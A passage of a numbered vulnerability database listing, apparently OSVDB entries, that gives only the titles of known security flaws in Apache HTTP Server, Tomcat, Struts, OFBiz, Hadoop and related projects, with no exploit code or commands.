16183| [85090] Apache HTTP Server mod_proxy_ajp.c mod_proxy_ajp Module Proxy Functionality Cross-client Information Disclosure
16184| [85089] Apache HTTP Server mod_proxy_http.c mod_proxy_http Module Cross-client Information Disclosure
16185| [85062] Apache Solr Autocomplete Module for Drupal Autocomplete Results XSS
16186| [85010] Apache Struts Token Handling Mechanism Token Name Configuration Parameter CSRF Weakness
16187| [85009] Apache Struts Request Parameter OGNL Expression Parsing Remote DoS
16188| [84911] libapache2-mod-rpaf X-Forward-For HTTP Header Parsing Remote DoS
16189| [84823] Apache HTTP Server Multiple Module Back End Server Error Handling HTTP Request Parsing Remote Information Disclosure
16190| [84818] Apache HTTP Server mod_negotiation Module mod_negotiation.c make_variant_list Function XSS
16191| [84562] Apache Qpid Broker Authentication Mechanism AMQP Client Shadow Connection NullAuthenticator Request Parsing Authentication Bypass
16192| [84458] Apache Libcloud SSL Certificate Validation MitM Spoofing Weakness
16193| [84279] PHP on Apache php_default_post_reader POST Request Handling Overflow DoS
16194| [84278] PHP w/ Apache PDO::ATTR_DEFAULT_FETCH_MODE / PDO::FETCH_CLASS DoS
16195| [84231] Apache Hadoop DataNodes Client BlockTokens Arbitrary Block Access
16196| [83943] Oracle Solaris Cluster Apache Tomcat Agent Subcomponent Unspecified Local Privilege Escalation
16197| [83939] Oracle Solaris Apache HTTP Server Subcomponent Unspecified Remote Information Disclosure
16198| [83685] svnauthcheck Apache HTTP Configuration File Permission Revocation Weakness
16199| [83682] Apache Sling POST Servlet @CopyFrom Operation HTTP Request Parsing Infinite Loop Remote DoS
16200| [83339] Apache Roller Blogger Roll Unspecified XSS
16201| [83270] Apache Roller Unspecified Admin Action CSRF
16202| [82782] Apache CXF WS-SecurityPolicy 1.1 SupportingToken Policy Bypass
16203| [82781] Apache CXF WS-SecurityPolicy Supporting Token Children Specification Token Signing Verification Weakness
16204| [82611] cPanel Apache Piped Log Configuration Log Message Formatting Traversal Arbitrary File Creation
16205| [82436] MapServer for Windows Bundled Apache / PHP Configuration Local File Inclusion
16206| [82215] PHP sapi/cgi/cgi_main.c apache_request_headers Function HTTP Header Handling Remote Overflow
16207| [82161] Apache Commons Compress bzip2 File Compression BZip2CompressorOutputStream Class File Handling Remote DoS
16208| [81965] Apache Batik Squiggle SVG Browser JAR File Arbitrary Code Execution
16209| [81790] Apache POI src/org/apache/poi/hwpf/model/UnhandledDataStructure.java UnhandledDataStructure() constructor Length Attribute CDF / CFBF File Handling Remote DoS
16210| [81660] Apache Qpid Credential Checking Cluster Authentication Bypass
16211| [81511] Apache for Debian /usr/share/doc HTTP Request Parsing Local Script Execution
16212| [81359] Apache HTTP Server LD_LIBRARY_PATH Variable Local Privilege Escalation
16213| [81349] Apache Open For Business Project (OFBiz) Webslinger Component Unspecified XSS
16214| [81348] Apache Open For Business Project (OFBiz) Content IDs / Map-Keys Unspecified XSS
16215| [81347] Apache Open For Business Project (OFBiz) Parameter Arrays Unspecified XSS
16216| [81346] Apache Open For Business Project (OFBiz) checkoutProcess.js getServerError() Function Unspecified XSS
16217| [81196] Apache Open For Business Project (OFBiz) FlexibleStringExpander Nested Script String Parsing Remote Code Execution
16218| [80981] Apache Hadoop Kerberos/MapReduce Security Feature User Impersonation Weakness
16219| [80571] Apache Traffic Server Host HTTP Header Parsing Remote Overflow
16220| [80547] Apache Struts XSLTResult.java File Upload Arbitrary Command Execution
16221| [80360] AskApache Password Protector Plugin for WordPress Error Page $_SERVER Superglobal XSS
16222| [80349] Apache HTTP Server mod_fcgid Module fcgid_spawn_ctl.c FcgidMaxProcessesPerClass Virtual Host Directive HTTP Request Parsing Remote DoS
16223| [80301] Apache Wicket /resources/ Absolute Path Arbitrary File Access
16224| [80300] Apache Wicket wicket:pageMapName Parameter XSS
16225| [79478] Apache Solr Extension for TYPO3 Unspecified XSS
16226| [79002] Apache MyFaces javax.faces.resource In Parameter Traversal Arbitrary File Access
16227| [78994] Apache Struts struts-examples/upload/upload-submit.do name Parameter XSS
16228| [78993] Apache Struts struts-cookbook/processDyna.do message Parameter XSS
16229| [78992] Apache Struts struts-cookbook/processSimple.do message Parameter XSS
16230| [78991] Apache Struts struts2-rest-showcase/orders clientName Parameter XSS
16231| [78990] Apache Struts struts2-showcase/person/editPerson.action Multiple Parameter XSS
16232| [78932] Apache APR Hash Collision Form Parameter Parsing Remote DoS
16233| [78903] Apache CXF SOAP Request Parsing WS-Security UsernameToken Policy Bypass
16234| [78600] Apache Tomcat HTTP DIGEST Authentication DigestAuthenticator.java Catalina Weakness Security Bypass
16235| [78599] Apache Tomcat HTTP DIGEST Authentication Realm Value Parsing Security Bypass
16236| [78598] Apache Tomcat HTTP DIGEST Authentication qop Value Parsing Security Bypass
16237| [78573] Apache Tomcat Parameter Saturation CPU Consumption Remote DoS
16238| [78556] Apache HTTP Server Status Code 400 Default Error Response httpOnly Cookie Disclosure
16239| [78555] Apache HTTP Server Threaded MPM %{cookiename}C Log Format String Cookie Handling Remote DoS
16240| [78501] Apache Struts ParameterInterceptor Class OGNL Expression Parsing Remote Command Execution
16241| [78331] Apache Tomcat Request Object Recycling Information Disclosure
16242| [78293] Apache HTTP Server Scoreboard Invalid Free Operation Local Security Bypass
16243| [78277] Apache Struts ExceptionDelegator Component Parameter Parsing Remote Code Execution
16244| [78276] Apache Struts DebuggingInterceptor Component Developer Mode Unspecified Remote Command Execution
16245| [78113] Apache Tomcat Hash Collision Form Parameter Parsing Remote DoS
16246| [78112] Apache Geronimo Hash Collision Form Parameter Parsing Remote DoS
16247| [78109] Apache Struts ParameterInterceptor Traversal Arbitrary File Overwrite
16248| [78108] Apache Struts CookieInterceptor Cookie Name Handling Remote Command Execution
16249| [77593] Apache Struts Conversion Error OGNL Expression Injection
16250| [77496] Apache ActiveMQ Failover Mechanism Openwire Request Parsing Remote DoS
16251| [77444] Apache HTTP Server mod_proxy Mdule Web Request HTTP/0.9 Protocol URL Parsing Proxy Remote Security Bypass
16252| [77374] Apache MyFaces Java Bean includeViewParameters Parsing EL Expression Security Weakness
16253| [77310] Apache HTTP Server mod_proxy Reverse Proxy Mode Security Bypass Weakness (2011-4317)
16254| [77234] Apache HTTP Server on cygwin Encoded Traversal Arbitrary File Access
16255| [77012] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Memory Consumption DoS
16256| [76944] Apache Tomcat Manager Application Servlets Access Restriction Bypass
16257| [76744] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Overflow
16258| [76189] Apache Tomcat HTTP DIGEST Authentication Weakness
16259| [76079] Apache HTTP Server mod_proxy Mdule Web Request URL Parsing Proxy Remote Security Bypass (2011-3368)
16260| [76072] Apache JServ jserv.conf jserv-status Handler jserv/ URI Request Parsing Local Information Disclosure
16261| [75807] Apache HTTP Server Incomplete Header Connection Saturation Remote DoS
16262| [75647] Apache HTTP Server mod_proxy_ajp Module mod_proxy_balancer HTTP Request Remote DoS
16263| [75376] Apache Libcloud SSL Certificate Validation MitM Server Spoofing Weakness
16264| [74853] Domain Technologie Control /etc/apache2/apache2.conf File Permissions Weakness dtcdaemons User Password Disclosure
16265| [74818] Apache Tomcat AJP Message Injection Authentication Bypass
16266| [74725] Apache Wicket Multi Window Support Unspecified XSS
16267| [74721] Apache HTTP Server ByteRange Filter Memory Exhaustion Remote DoS
16268| [74541] Apache Commons Daemon Jsvc Permissions Weakness Arbitrary File Access
16269| [74535] Apache Tomcat XML Parser Cross-application Multiple File Manipulation
16270| [74447] Apache Struts XWork Nonexistent Method s:submit Element Internal Java Class Remote Path Disclosure
16271| [74262] Apache HTTP Server Multi-Processing Module itk.c Configuration Merger mpm-itk root UID / GID Remote Privilege Escalation
16272| [74120] Apache HTTP Server mod_authnz_external mysql/mysql-auth.pl user Field SQL Injection
16273| [73920] Oracle Secure Backup /apache/htdocts/php/common.php username Parameter Remote Code Execution
16274| [73798] Apache Tomcat sendfile Request Start / Endpoint Parsing Local DoS
16275| [73797] Apache Tomcat sendfile Request Attribute Validation Weakness Local Access Restriction Bypass
16276| [73776] Apache Tomcat HTTP BIO Connector HTTP Pipelining Cross-user Remote Response Access
16277| [73644] Apache XML Security Signature Key Parsing Overflow DoS
16278| [73600] Apache Struts javatemplates Plugin Component Handlers .action URI Multiple Parameter XSS
16279| [73462] Apache Rampart/C util/rampart_timestamp_token.c rampart_timestamp_token_validate Function Expired Token Remote Access Restriction Bypass
16280| [73429] Apache Tomcat JMX MemoryUserDatabase Local Password Disclosure
16281| [73384] Apache HTTP Server mod_rewrite PCRE Resource Exhaustion DoS
16282| [73383] Apache HTTP Server Portable Runtime (APR) Library apr_fnmatch() Infinite Loop Remote DoS
16283| [73378] IBM WebSphere Application Server (WAS) JavaServer Pages org.apache.jasper.runtime.JspWriterImpl.response JSP Page Application Restart Remote DoS
16284| [73247] Apache Subversion mod_dav_svn File Permission Weakness Information Disclosure
16285| [73246] Apache Subversion mod_dav_svn Path-based Access Control Rule Handling Remote DoS
16286| [73245] Apache Subversion mod_dav_svn Baselined Resource Request Handling Remote DoS
16287| [73154] Apache Archiva Multiple Unspecified CSRF
16288| [73153] Apache Archiva /archiva/admin/deleteNetworkProxy!confirm.action proxyid Parameter XSS
16289| [72407] Apache Tomcat @ServletSecurity Initial Load Annotation Security Constraint Bypass Information Disclosure
16290| [72238] Apache Struts Action / Method Names <
16291| [71647] Apache HttpComponents HttpClient Proxy-Authorization Credentials Remote Disclosure
16292| [71558] Apache Tomcat SecurityManager ServletContext Attribute Traversal Arbitrary File Manipulation
16293| [71557] Apache Tomcat HTML Manager Multiple XSS
16294| [71075] Apache Archiva User Management Page XSS
16295| [71027] Apache Tomcat @ServletSecurity Annotation Security Constraint Bypass Information Disclosure
16296| [70925] Apache Continuum Project Pages Unspecified XSS (2011-0533)
16297| [70924] Apache Continuum Multiple Admin Function CSRF
16298| [70809] Apache Tomcat NIO HTTP Connector Request Line Processing DoS
16299| [70734] Apache CouchDB Request / Cookie Handling Unspecified XSS
16300| [70585] Oracle Fusion Middleware Oracle HTTP Server Apache Plugin Unspecified Remote Issue
16301| [70333] Apache Subversion rev_hunt.c blame Command Multiple Memory Leak Remote DoS
16302| [70332] Apache Subversion Apache HTTP Server mod_dav_svn repos.c walk FunctionSVNParentPath Collection Remote DoS
16303| [69659] Apache Archiva Admin Authentication Weakness Privilege Escalation
16304| [69520] Apache Archiva Administrator Credential Manipulation CSRF
16305| [69512] Apache Tomcat Set-Cookie Header HTTPOnly Flag Session Hijacking Weakness
16306| [69456] Apache Tomcat Manager manager/html/sessions Multiple Parameter XSS
16307| [69275] Apache mod_fcgid Module fcgid_bucket.c fcgid_header_bucket_read() Function Remote Overflow
16308| [69067] Apache Shiro URI Path Security Traversal Information Disclosure
16309| [68815] Apache MyFaces shared/util/StateUtils.java View State MAC Weakness Cryptographic Padding Remote View State Modification
16310| [68670] Apache Qpid C++ Broker Component broker/SessionAdapter.cpp SessionAdapter::ExchangeHandlerImpl::checkAlternate Function Exchange Alternate Remote DoS
16311| [68669] Apache Qpid cluster/Cluster.cpp Cluster::deliveredEvent Function Invalid AMQP Data Remote DoS
16312| [68662] Apache Axis2 dswsbobje.war Module Admin Account Default Password
16313| [68531] Apache Qpid qpidd sys/ssl/SslSocket.cpp Incomplete SSL Handshake Remote DoS
16314| [68327] Apache APR-util buckets/apr_brigade.c apr_brigade_split_line() Function Memory Consumption DoS
16315| [68314] Apache XML-RPC SAX Parser External Entity Information Disclosure
16316| [67964] Apache Traffic Server Transaction ID / Source Port Randomization Weakness DNS Cache Poisoning
16317| [67846] SUSE Lifecycle Management Server on SUSE Linux Enterprise apache2-slms Parameter Quoting CSRF
16318| [67294] Apache CXF XML SOAP Message Crafted Document Type Declaration Remote DoS
16319| [67240] Apache CouchDB Installation Page Direct Request Arbitrary JavaScript Code Execution CSRF
16320| [67205] Apache Derby BUILTIN Authentication Password Hash Generation Algorithm SHA-1 Transformation Password Substitution
16321| [66745] Apache HTTP Server Multiple Modules Pathless Request Remote DoS
16322| [66319] Apache Tomcat Crafted Transfer-Encoding Header Handling Buffer Recycling Remote DoS
16323| [66280] Apache Struts XWork ParameterInterceptor Server-Side Object Remote Code Execution
16324| [66226] Apache Axis2 Admin Interface Cookie Session Fixation
16325| [65697] Apache Axis2 / Java SOAP Message DTD Rejection Weakness Arbitrary File Access
16326| [65654] Apache HTTP Server mod_proxy_http mod_proxy_http.c Timeout Detection Weakness HTTP Request Response Disclosure
16327| [65429] Apache MyFaces Unencrypted ViewState Serialized View Object Manipulation Arbitrary Expression Language (EL) Statement Execution
16328| [65054] Apache ActiveMQ Jetty Error Handler XSS
16329| [64844] Apache Axis2/Java axis2/axis2-admin/engagingglobally modules Parameter XSS
16330| [64522] Apache Open For Business Project (OFBiz) ecommerce/control/contactus Multiple Parameter XSS
16331| [64521] Apache Open For Business Project (OFBiz) Web Tools Section entityName Parameter XSS
16332| [64520] Apache Open For Business Project (OFBiz) ecommerce/control/ViewBlogArticle contentId Parameter XSS
16333| [64519] Apache Open For Business Project (OFBiz) Control Servlet URI XSS
16334| [64518] Apache Open For Business Project (OFBiz) Show Portal Page Section start Parameter XSS
16335| [64517] Apache Open For Business Project (OFBiz) View Profile Section partyId Parameter XSS
16336| [64516] Apache Open For Business Project (OFBiz) Export Product Listing Section productStoreId Parameter XSS
16337| [64307] Apache Tomcat Web Application Manager/Host Manager CSRF
16338| [64056] mod_auth_shadow for Apache HTTP Server wait() Function Authentication Bypass
16339| [64023] Apache Tomcat WWW-Authenticate Header Local Host Information Disclosure
16340| [64020] Apache ActiveMQ Jetty ResourceHandler Crafted Request JSP File Source Disclosure
16341| [63895] Apache HTTP Server mod_headers Unspecified Issue
16342| [63368] Apache ActiveMQ createDestination.action JMSDestination Parameter CSRF
16343| [63367] Apache ActiveMQ createDestination.action JMSDestination Parameter XSS
16344| [63350] Apache CouchDB Hash Verification Algorithm Predictable Execution Time Weakness
16345| [63140] Apache Thrift Service Malformed Data Remote DoS
16346| [62676] Apache HTTP Server mod_proxy_ajp Module Crafted Request Remote DoS
16347| [62675] Apache HTTP Server Multi-Processing Module (MPM) Subrequest Header Handling Cross-thread Information Disclosure
16348| [62674] Apache HTTP Server mod_isapi Module Unloading Crafted Request Remote DoS
16349| [62231] Apache HTTP Server Logging Format Weakness Crafted DNS Response IP Address Spoofing
16350| [62230] Apache HTTP Server Crafted DNS Response Inverse Lookup Log Corruption XSS
16351| [62054] Apache Tomcat WAR Filename Traversal Work-directory File Deletion
16352| [62053] Apache Tomcat Autodeployment Process appBase File HTTP Request Authentication Bypass
16353| [62052] Apache Tomcat WAR File Traversal Arbitrary File Overwrite
16354| [62009] Apache HTTP Server src/modules/proxy/proxy_util.c mod_proxy ap_proxy_send_fb() Function Overflow
16355| [61379] Apache River Outrigger Entry Storage Saturation Memory Exhaustion DoS
16356| [61378] Apache Hadoop Map/Reduce JobTracker Memory Consumption DoS
16357| [61377] Apache Commons Modeler Multiple Mutable Static Fields Weakness
16358| [61376] Apache Rampart wsse:security Tag Signature Value Checking Weakness
16359| [60687] Apache C++ Standard Library (STDCXX) strxfrm() Function Overflow
16360| [60680] Apache Hadoop JobHistory Job Name Manipulation Weakness
16361| [60679] Apache ODE DeploymentWebService OMElement zipPart CRLF Injection
16362| [60678] Apache Roller Comment Email Notification Manipulation DoS
16363| [60677] Apache CouchDB Unspecified Document Handling Remote DoS
16364| [60428] Sun Java Plug-in org.apache.crimson.tree.XmlDocument Class reateXmlDocument Method Floppy Drive Access Bypass
16365| [60413] mod_throttle for Apache Shared Memory File Manipulation Local Privilege Escalation
16366| [60412] Sun Java Plug-in org.apache.xalan.processor.XSLProcessorVersion Class Unsigned Applet Variable Sharing Privilege Escalation
16367| [60396] Apache HTTP Server on OpenBSD Multipart MIME Boundary Remote Information Disclosure
16368| [60395] Apache HTTP Server on OpenBSD ETag HTTP Header Remote Information Disclosure
16369| [60232] PHP on Apache php.exe Direct Request Remote DoS
16370| [60176] Apache Tomcat Windows Installer Admin Default Password
16371| [60016] Apache HTTP Server on HP Secure OS for Linux HTTP Request Handling Unspecified Issue
16372| [59979] Apache HTTP Server on Apple Mac OS X HTTP TRACE Method Unspecified Client XSS
16373| [59969] Apache HTTP Server mod_ssl SSL / TLS Renegotiation Handshakes MiTM Plaintext Data Injection
16374| [59944] Apache Hadoop jobhistory.jsp XSS
16375| [59374] Apache Solr Search Extension for TYPO3 Unspecified XSS
16376| [59022] Apache Shindig ConcatProxyServlet HTTP Header Response Splitting
16377| [59021] Apache Cocoon X-Cocoon-Version Header Remote Information Disclosure
16378| [59020] Apache Tapestry HTTPS Session Cookie Secure Flag Weakness
16379| [59019] Apache mod_python Cookie Salting Weakness
16380| [59018] Apache Harmony Error Message Handling Overflow
16381| [59013] Apache Derby SYSCS_EXPORT_TABLE Arbitrary File Overwrite
16382| [59012] Apache Derby Driver Auto-loading Non-deterministic Startup Weakness
16383| [59011] Apache JSPWiki Page Attachment Change Note Function XSS
16384| [59010] Apache Solr get-file.jsp XSS
16385| [59009] Apache Solr action.jsp XSS
16386| [59008] Apache Solr analysis.jsp XSS
16387| [59007] Apache Solr schema.jsp Multiple Parameter XSS
16388| [59006] Apache Beehive select / checkbox Tag XSS
16389| [59005] Apache Beehive jpfScopeID Global Parameter XSS
16390| [59004] Apache Beehive Error Message XSS
16391| [59003] Apache HttpClient POST Request Handling Memory Consumption DoS
16392| [59002] Apache Jetspeed default-page.psml URI XSS
16393| [59001] Apache Axis2 xsd Parameter Traversal Arbitrary File Disclosure
16394| [59000] Apache CXF Unsigned Message Policy Bypass
16395| [58999] Apache WSS4J CallbackHandler Plaintext Password Validation Weakness
16396| [58998] Apache OpenJPA persistence.xml Cleartext Password Local Disclosure
16397| [58997] Apache OpenEJB openejb.xml Cleartext Password Local Disclosure
16398| [58996] Apache Hadoop Map/Reduce LinuxTaskController File Group Ownership Weakness
16399| [58995] Apache Hadoop Map/Reduce Task Ownership Weakness
16400| [58994] Apache Hadoop Map/Reduce DistributedCache Localized File Permission Weakness
16401| [58993] Apache Hadoop browseBlock.jsp XSS
16402| [58991] Apache Hadoop browseDirectory.jsp XSS
16403| [58990] Apache Hadoop Map/Reduce HTTP TaskTrackers User Data Remote Disclosure
16404| [58989] Apache Hadoop Sqoop Process Listing Local Cleartext Password Disclosure
16405| [58988] Apache Hadoop Chukwa HICC Portal Unspecified XSS
16406| [58987] Apache Hadoop Map/Reduce TaskTracker User File Permission Weakness
16407| [58986] Apache Qpid Encrypted Message Handling Remote Overflow DoS
16408| [58985] Apache Qpid Process Listing Local Cleartext Password Disclosure
16409| [58984] Apache Jackrabbit Content Repository (JCR) Default Account Privilege Access Weakness
16410| [58983] Apache Jackrabbit Content Repository (JCR) NamespaceRegistry API Registration Method Race Condition
16411| [58982] Apache Synapse Proxy Service Security Policy Mismatch Weakness
16412| [58981] Apache Geronimo TomcatGeronimoRealm Security Context Persistence Weakness
16413| [58980] Apache Geronimo LDAP Realm Configuration Restart Reversion Weakness
16414| [58979] Apache MyFaces Tomahawk ExtensionsPhaseListener HTML Injection Information Disclosure
16415| [58978] Apache MyFaces Trinidad LocaleInfoScriptlet XSS
16416| [58977] Apache Open For Business Project (OFBiz) Multiple Default Accounts
16417| [58976] Apache Open For Business Project (OFBiz) URI passThru Parameter XSS
16418| [58975] Apache Open For Business Project (OFBiz) PARTYMGR_CREATE/UPDATE Permission Arbitrary User Password Modification
16419| [58974] Apache Sling /apps Script User Session Management Access Weakness
16420| [58973] Apache Tuscany Crafted SOAP Request Access Restriction Bypass
16421| [58931] Apache Geronimo Cookie Parameters Validation Weakness
16422| [58930] Apache Xalan-C++ XPath Handling Remote DoS
16423| [58879] Apache Portable Runtime (APR-util) poll/unix/port.c Event Port Backend Pollset Feature Remote DoS
16424| [58837] Apache Commons Net FTPSClient CipherSuites / Protocols Mutable Object Unspecified Data Security Issue
16425| [58813] Apache MyFaces Trinidad tr:table / HTML Comment Handling DoS
16426| [58812] Apache Open For Business Project (OFBiz) JSESSIONID Session Hijacking Weakness
16427| [58811] Apache Open For Business Project (OFBiz) /catalog/control/EditProductConfigItem configItemId Parameter XSS
16428| [58810] Apache Open For Business Project (OFBiz) /catalog/control/EditProdCatalo prodCatalogId Parameter XSS
16429| [58809] Apache Open For Business Project (OFBiz) /partymgr/control/viewprofile partyId Parameter XSS
16430| [58808] Apache Open For Business Project (OFBiz) /catalog/control/createProduct internalName Parameter XSS
16431| [58807] Apache Open For Business Project (OFBiz) Multiple Unspecified CSRF
16432| [58806] Apache FtpServer MINA Logging Filter Cleartext Credential Local Disclosure
16433| [58805] Apache Derby Unauthenticated Database / Admin Access
16434| [58804] Apache Wicket Header Contribution Unspecified Issue
16435| [58803] Apache Wicket Session Fixation
16436| [58802] Apache Directory Server (ApacheDS) userPassword Attribute Search Password Disclosure
16437| [58801] Apache ActiveMQ Stomp Client Credential Validation Bypass
16438| [58800] Apache Tapestry (context)/servicestatus Internal Service Information Disclosure
16439| [58799] Apache Tapestry Logging Cleartext Password Disclosure
16440| [58798] Apache Jetspeed pipeline Parameter pipeline-map Policy Bypass
16441| [58797] Apache Jetspeed Password Policy Multiple Weaknesses
16442| [58796] Apache Jetspeed Unsalted Password Storage Weakness
16443| [58795] Apache Rampart Crafted SOAP Header Authentication Bypass
16444| [58794] Apache Roller Admin Protocol (RAP) Malformed Header Authentication Bypass
16445| [58793] Apache Hadoop Map/Reduce mapred.system.dir Permission Weakness Job Manipulation
16446| [58792] Apache Shindig gadgets.rpc iframe RPC Call Validation Weakness
16447| [58791] Apache Synapse synapse.properties Cleartext Credential Local Disclosure
16448| [58790] Apache WSS4J SOAP Message UsernameToken Remote Password Disclosure
16449| [58789] Apache WSS4J SOAP Header Malformed UsernameToken Authentication Bypass
16450| [58776] Apache JSPWiki PreviewContent.jsp Edited Text XSS
16451| [58775] Apache JSPWiki preview.jsp action Parameter XSS
16452| [58774] Apache JSPWiki Edit.jsp Multiple Parameter XSS
16453| [58773] Apache JSPWiki Accept-Language Header Multiple Script language Parameter XSS
16454| [58772] Apache JSPWiki EditorManager.java editor Parameter XSS
16455| [58771] Apache JSPWiki GroupContent.jsp Multiple Parameter XSS
16456| [58770] Apache JSPWiki Group.jsp group Parameter XSS
16457| [58769] Apache JSPWiki Database Connection Termination DoS Weakness
16458| [58768] Apache JSPWiki Attachment Servlet nextpage Parameter Arbitrary Site Redirect
16459| [58766] Apache JSPWiki /admin/SecurityConfig.jsp Direct Request Information Disclosure
16460| [58765] Apache JSPWiki Spam Filter UniqueID RNG Weakness
16461| [58764] Apache JSPWiki Edit.jsp Multiple Parameter XSS
16462| [58763] Apache JSPWiki Include Tag Multiple Script XSS
16463| [58762] Apache JSPWiki Multiple .java Tags pageContext Parameter XSS
16464| [58761] Apache JSPWiki Wiki.jsp skin Parameter XSS
16465| [58760] Apache Commons VFS Exception Error Message Cleartext Credential Disclosure
16466| [58759] Apache Jackrabbit Content Repository (JCR) UUID System.currentTimeMillis() RNG Weakness
16467| [58758] Apache River GrantPermission Policy Manipulation Privilege Escalation
16468| [58757] Apache WS-Commons Java2 StaXUtils Multiple Unspecified Minor Issues
16469| [58756] Apache WSS4J WSHandler Client Certificate Signature Validation Weakness
16470| [58755] Apache Harmony DRLVM Non-public Class Member Access
16471| [58754] Apache Harmony File.createTempFile() Temporary File Creation Prediction Weakness
16472| [58751] Apache Geronimo GeronimoIdentityResolver Subject Handling Multiple Issues
16473| [58750] Apache MyFaces Trinidad Generated HTML Information Disclosure
16474| [58749] Apache MyFaces Trinidad Database Access Error Message Information Disclosure
16475| [58748] Apache MyFaces Trinidad Image Resource Loader Traversal Arbitrary Image Access
16476| [58747] Apache MyFaces Trinidad Error Message User Entered Data Disclosure Weakness
16477| [58746] Apache Axis2 JAX-WS Java2 WSDL4J Unspecified Issue
16478| [58744] Apache Wicket Crafted File Upload Disk Space Exhaustion DoS
16479| [58743] Apache Wicket wicket.util.crypt.SunJceCrypt Encryption Reversion Weakness
16480| [58742] Apache Rampart PolicyBasedValiadtor HttpsToken Endpoint Connection Weakness
16481| [58741] Apache Rampart WSSecSignature / WSSecEncryptedKey KeyIdentifierType Validation Weakness
16482| [58740] Apache Rampart TransportBinding Message Payload Cleartext Disclosure
16483| [58739] Apache Open For Business Project (OFBiz) Unsalted Password Storage Weakness
16484| [58738] Apache Open For Business Project (OFBiz) orderId Parameter Arbitrary Order Access
16485| [58737] Apache mod_python w/ mod_python.publisher index.py Underscore Prefixed Variable Disclosure
16486| [58735] Apache Open For Business Project (OFBiz) /ecommerce/control/keywordsearch SEARCH_STRING Parameter XSS
16487| [58734] Apache Torque Log File Cleartext Credential Local Disclosure
16488| [58733] Apache Axis2 doGet Implementation Authentication Bypass Service State Manipulation
16489| [58732] Apache MyFaces UIInput.validate() Null Value Validation Bypass Weakness
16490| [58731] Apache MyFaces /faces/* Prefix Mapping Authentication Bypass
16491| [58725] Apache Tapestry Basic String ACL Bypass Weakness
16492| [58724] Apache Roller Logout Functionality Failure Session Persistence
16493| [58723] Apache Roller User Profile / Admin Page Cleartext Password Disclosure
16494| [58722] Apache Derby Connection URL Encryption Method Reversion Weakness
16495| [58721] Apache Geronimo on Tomcat Security-constraint Resource ACL Bypass
16496| [58720] Apache Geronimo Explicit Servlet Mapping Access Bypass Weakness
16497| [58719] Apache Geronimo Keystore Unprivileged Service Disable DoS
16498| [58718] Apache Geronimo Deployment Plans Remote Password Disclosure
16499| [58717] Apache Jetspeed Portlet Application Edit Access Restriction Bypass
16500| [58716] Apache Jetspeed PSML Management Cached Constraint Authentication Weakness
16501| [58707] Apache WSS4J Crafted PasswordDigest Request Authentication Bypass
16502| [58706] Apache HttpClient Pre-emptive Authorization Remote Credential Disclosure
16503| [58705] Apache Directory Server (ApacheDS) User Passwords Cleartext Disclosure
16504| [58704] Apache Directory Server (ApacheDS) Non-existent User LDAP Bind Remote DoS
16505| [58703] Apache Geronimo Debug Console Unauthenticated Remote Information Disclosure
16506| [58702] Apache Directory Server (ApacheDS) Persistent LDAP Anonymous Bind Weakness
16507| [58701] Apache Jetspeed User Admin Portlet Unpassworded Account Creation Weakness
16508| [58700] Apache MyFaces /faces/* Path Handling Remote Overflow DoS
16509| [58699] Apache MyFaces Disable Property Client Side Manipulation Privilege Escalation
16510| [58698] Apache Roller Remember Me Functionality Cleartext Password Disclosure
16511| [58697] Apache XalanJ2 org.apache.xalan.xsltc.runtime.CallFunction Class Unspecified Issue
16512| [58696] Apache Tapestry Encoded Traversal Arbitrary File Access
16513| [58695] Apache Jetspeed Unauthenticated PSML Tags / Admin Folder Access
16514| [58694] Apache Geronimo Deploy Tool Process List Local Credential Disclosure
16515| [58693] Apache Derby service.properties File Encryption Key Information Disclosure
16516| [58692] Apache Geronimo Default Security Realm Login Brute Force Weakness
16517| [58689] Apache Roller Retrieve Last 5 Post Feature Unauthorized Blog Post Manipulation
16518| [58688] Apache Xalan-Java (XalanJ2) Static Variables Multiple Unspecified Issues
16519| [58687] Apache Axis Invalid wsdl Request XSS
16520| [58686] Apache Cocoon Temporary File Creation Unspecified Race Condition
16521| [58685] Apache Velocity Template Designer Privileged Code Execution
16522| [58684] Apache Jetspeed controls.Customize Action Security Check Bypass
16523| [58675] Apache Open For Business Project (OFBiz) eCommerce/ordermgr Multiple Field XSS
16524| [58674] Apache Open For Business Project (OFBiz) ecommerce/control/login Multiple Field XSS
16525| [58673] Apache Open For Business Project (OFBiz) ecommerce/control/viewprofile Multiple Field XSS
16526| [58672] Apache Open For Business Project (OFBiz) POS Input Panel Cleartext Password Disclosure
16527| [58671] Apache Axis2 JMS Signed Message Crafted WS-Security Header Security Bypass
16528| [58670] Apache Jetspeed JetspeedTool.getPortletFromRegistry Portlet Security Validation Failure
16529| [58669] Apache Jetspeed LDAP Cleartext Passwords Disclosure
16530| [58668] Apache Axis External Entity (XXE) Data Parsing Privilege Escalation
16531| [58667] Apache Roller Database Cleartext Passwords Disclosure
16532| [58666] Apache Xerces-C++ UTF-8 Transcoder Overlong Code Handling Unspecified Issue
16533| [58665] Apache Jetspeed Turbine: Cross-user Privileged Action Execution
16534| [58664] Apache Jetspeed EditAccount.vm Password Modification Weakness
16535| [58663] Apache Jetspeed Role Parameter Arbitrary Portlet Disclosure
16536| [58662] Apache Axis JWS Page Generated .class File Direct Request Information Disclosure
16537| [58661] Apache Jetspeed user-form.vm Password Reset Cleartext Disclosure
16538| [58660] Apache WSS4J checkReceiverResults Function Crafted SOAP Request Authentication Bypass
16539| [58658] Apache Rampart Crafted SOAP Request Security Verification Bypass
16540| [57882] Apache HTTP Server mod_proxy_ftp Authorization HTTP Header Arbitrary FTP Command Injection
16541| [57851] Apache HTTP Server mod_proxy_ftp EPSV Command NULL Dereference Remote DoS
16542| [56984] Apache Xerces2 Java Malformed XML Input DoS
16543| [56903] Apache ODE (Orchestration Director Engine) Process Deployment Web Service Traversal Arbitrary File Manipulation
16544| [56859] Apache Xerces-C++ Multiple Sub-project XML Nested DTD Structures Parsing Recursion Error DoS
16545| [56766] Apache Portable Runtime (APR-util) memory/unix/apr_pools.c Relocatable Memory Block Aligning Overflow
16546| [56765] Apache Portable Runtime (APR-util) misc/apr_rmm.c Multiple Function Overflows
16547| [56517] Apache HTTP Server File Descriptor Leak Arbitrary Local File Append
16548| [56443] PTK Unspecified Apache Sub-process Arbitrary Command Execution
16549| [56414] Apache Tiles Duplicate Expression Language (EL) Expression Evaluation XSS
16550| [55814] mod_NTLM for Apache HTTP Server ap_log_rerror() Function Remote Format String
16551| [55813] mod_NTLM for Apache HTTP Server log() Function Remote Overflow
16552| [55782] Apache HTTP Server mod_deflate Module Aborted Connection DoS
